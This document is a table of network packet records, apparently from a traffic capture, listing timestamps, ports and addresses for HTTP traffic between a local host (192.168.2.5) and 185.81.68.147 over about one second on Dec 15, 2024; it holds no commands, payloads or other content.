                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.663655996 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.664052010 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.664407015 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.664802074 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.665029049 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.665076017 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.666053057 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.666069984 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.666136026 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.667200089 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.667252064 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.667304039 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.668421030 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.668549061 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.668620110 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.669548035 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.669569016 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.669631004 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.670859098 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.670937061 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.670989037 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.671710014 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.705825090 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.723766088 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.802814007 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.803044081 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.803107023 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.803358078 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.803601980 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.803647041 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.803872108 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.804785013 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.804837942 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.804898024 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.805999041 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.806060076 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.806111097 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.807149887 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.807193995 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.807204008 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.808300972 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.808351994 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.808362007 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.809494972 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.809545994 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.809556007 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.810769081 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.810791969 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.810853004 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.811830997 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.811883926 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.811917067 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.812932014 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.812993050 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.813050985 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.814121962 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.814176083 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.814244986 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.815193892 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.815237999 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.815295935 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.816499949 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.816550970 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.816585064 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.817688942 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.817713976 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.817773104 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.819097042 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.819204092 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.819259882 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.820313931 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.820337057 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.820400000 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.821444035 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.821465015 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.821501970 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.822577000 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.822633982 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.822660923 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.823543072 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.823564053 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.823596001 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.824485064 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.824541092 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.824603081 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.825736046 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.825788975 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.825805902 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.826795101 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.827033043 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.827106953 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.828064919 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.828087091 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.828114033 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.829135895 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.829186916 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.829346895 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.830416918 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.830444098 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.830466032 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.831533909 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.831556082 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.831595898 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.832727909 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.832775116 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.832786083 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.833890915 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.833969116 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.834001064 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.835302114 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.835367918 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.835376024 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.836369038 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.836388111 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.836427927 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.837407112 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.837426901 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.837488890 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.838412046 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.838466883 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.838577986 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.839607954 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.839669943 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.839730978 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.840831041 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.840863943 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.840886116 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.841912031 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.841984034 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.842031002 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.843214989 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.843235016 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.843272924 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.844322920 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.844378948 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.844393969 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.845494032 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.845525026 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.845544100 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.846538067 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.846605062 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.846651077 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.847726107 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.847843885 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.847863913 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.848948956 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.848982096 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.848999977 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.850045919 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.850106001 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.850213051 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.851330996 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.851351023 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.851388931 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.852475882 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.852495909 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.852551937 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.853631973 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.853655100 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.853682041 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.854799986 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.854815960 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.854882002 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.855906010 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.855974913 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.855987072 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.857065916 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.857228041 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.857310057 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.858248949 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.858269930 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.858295918 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.859371901 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.859424114 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.859460115 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.860582113 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.860635042 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.860651970 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.861661911 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.861716032 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.861769915 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.862852097 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.862979889 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.863010883 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.911273003 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.995203018 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.995255947 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.995348930 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.995517969 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.995872974 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.995908976 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.995938063 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.996977091 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.997071028 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.997109890 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.998178959 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.998248100 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.998317003 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.999375105 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.999444008 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.999473095 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.000487089 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.000523090 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.000547886 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.001576900 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.001646042 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.001709938 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.002748013 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.002820969 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.002846956 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.004008055 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.004075050 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.004187107 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.005054951 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.005131960 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.005273104 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.006402969 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.006438971 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.006467104 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.007405996 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.007441044 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.007474899 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.008644104 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.008677959 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.008706093 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.009679079 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.009808064 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.009927988 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.010972977 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.011008024 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.011035919 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.012094975 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.012167931 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.012206078 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.013159037 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.013219118 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.013340950 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.014358997 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.014424086 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.014470100 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.015599966 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.015634060 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.015664101 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.016633987 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.016695023 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.016772032 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.017834902 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.017910004 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.017925978 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.019087076 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.019119978 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.019150972 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.020215988 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.020277023 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.020746946 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.020988941 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.021265984 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.021327019 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.021401882 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.022576094 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.022608995 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.022710085 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.023749113 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.023782969 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.023823977 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.024908066 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.024943113 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.024960041 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.026094913 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.026128054 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.026173115 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.027199030 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.027232885 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.027264118 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.028310061 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.028363943 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.028402090 CET8049708185.81.68.147192.168.2.5
